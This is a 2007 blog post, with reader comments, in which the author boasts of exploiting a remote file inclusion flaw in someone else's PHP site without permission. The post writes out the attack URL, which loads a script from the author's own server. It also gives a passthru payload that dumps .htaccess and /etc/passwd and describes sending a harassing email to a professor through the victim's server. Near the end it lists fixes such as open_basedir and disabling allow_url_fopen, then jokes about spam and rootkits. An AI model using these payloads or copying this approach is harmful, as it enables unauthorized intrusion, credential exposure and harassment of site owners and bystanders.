Dun Dun Dunnnnnnnnn

Posted by Nessa | Posted in ,, | Posted on August 3, 2007

3

Just a nice life lesson for my fellow lazy programmers:

I was looking at this site the other day in class while I was researching some crap on sub-netting (which is not one of my high points btw) and I noticed an all-too-obvious URL structure that just screamed “hack me! please!” It’s a pagerank 5 site so I know that it’s getting quite a bit of traffic, so I’m surprised this hasn’t happened enough to the point where the site developer would fix his shit. Probably an example of the worst URL compilation I’ve seen in a while:

http://hiswebsite.com/index.php?page=subnett-2.php

I wrote simple php mailing script called ‘spam-me.php’ and uploaded it to my school space, then ran it off the guy’s site. I think I sent one of my professors an email about how unsatisfied his wife is, simply by tacking on my URL as the page definition:

http://hiswebsite.com/index.php?page=http://students.ecpi.edu/~<omitted>/spam-me.php

It was even better when I was able to view his .htaccess and /etc/passwd files by writing using the passthru function in another script that I ran from his site:

<?php passthru("cat ./.htaccess");
passthru("cat /etc/passwd");

?>

Since I’m a good person I emailed the guy about this little security problem of his. I can’t say he took it very well (it was more like someone killed his dog and left parts of it bundled up in gift wrapping on his doorstep), but the next day he took his site down. I made a point to mention that this wouldn’t have happened if he:

  1. Used the file_exists() function to specify what filenames can be presented in his URL
  2. Had mod_security installed so I couldn’t view his .htaccess
  3. Maybe disable allow_url_fopen so my site couldn’t be called as an include
  4. Had open_basedir protection so his system files can’t be accessed by php

Worse case I could have sent out a school-wide email offering penis enlargement pills, and then execute a root kit on his server. But then again, I’m a nice person, remember?

Be Sociable, Share!

Comments (3)

Just another reason I generally send people an e-mail from an anonymous use once e-mail address.. Got tired of dealing with A-Holes who get retarted when someone points out their mistakes. Definately a good lesson to remember tho.. :)

I should have spammed the sh!t out of his server. He ended up emailing me asking me how to fix his site, I told him he’s better off just using html =D

*G* or getting a job a burger king, one of the two…

Post a comment